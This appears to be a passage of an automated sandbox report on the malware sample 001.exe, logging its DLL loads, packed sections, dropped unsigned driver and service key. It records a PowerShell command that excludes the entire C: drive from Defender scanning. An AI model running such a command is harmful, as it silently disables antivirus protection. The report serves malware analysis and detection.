Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\001.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
Source: C:\Users\user\Desktop\001.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\Jump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 001.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 001.exeStatic file information: File size 2034688 > 1048576
Source: 001.exeStatic PE information: Raw size of so2 is bigger than: 0x100000 < 0x1dc600
Source: Binary string: J.Pdby source: 001.exe
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085C634 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,1_2_0085C634
Source: initial sampleStatic PE information: section where entry point is pointing to: so2
Source: 001.exeStatic PE information: section name: so0
Source: 001.exeStatic PE information: section name: so1
Source: 001.exeStatic PE information: section name: so2
Source: 1Qkj6qa_7944.sys.1.drStatic PE information: section name: vs0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF048 push 00000012h; ret 1_2_008BF053
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF050 push 00000012h; ret 1_2_008BF053
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF500 push rbp; ret 1_2_008BF502
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF540 push rcx; ret 1_2_008BF54A
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008C86F0 push rax; ret 1_2_008C8701
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008C8748 push rax; retn 008Ch1_2_008C8759
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00842D40 push rcx; iretd 1_2_00842D43
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008C7E88 push rax; retn 008Ch1_2_008C7E89
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D80D2A5 pushad ; iretd 2_2_00007FFC3D80D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D92BA7A push E85B10D7h; ret 2_2_00007FFC3D92BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D92BA3D push E85B10D7h; ret 2_2_00007FFC3D92BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D920982 push E85DE75Dh; ret 2_2_00007FFC3D9209F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D9209FA push E85DE75Dh; ret 2_2_00007FFC3D9209F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D9200BD pushad ; iretd 2_2_00007FFC3D9200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3D90D2A5 pushad ; iretd 11_2_00007FFC3D90D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3DA219DB pushad ; ret 11_2_00007FFC3DA219E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3DA200BD pushad ; iretd 11_2_00007FFC3DA200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3DAF2316 push 8B485F93h; iretd 11_2_00007FFC3DAF231B
Source: 001.exeStatic PE information: section name: so2 entropy: 7.983182289557186
Source: 1Qkj6qa_7944.sys.1.drStatic PE information: section name: .text entropy: 7.126561604240753

Persistence and Installation Behavior

barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\001.exeFile created: C:\Windows\Temp\1Qkj6qa_7944.sysJump to behavior
Source: C:\Users\user\Desktop\001.exeFile created: C:\Windows\Temp\1Qkj6qa_7944.sysJump to dropped file
Source: C:\Users\user\Desktop\001.exeFile created: C:\Windows\Temp\1Qkj6qa_7944.sysJump to dropped file
Source: C:\Users\user\Desktop\001.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nKxb3J_7944Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
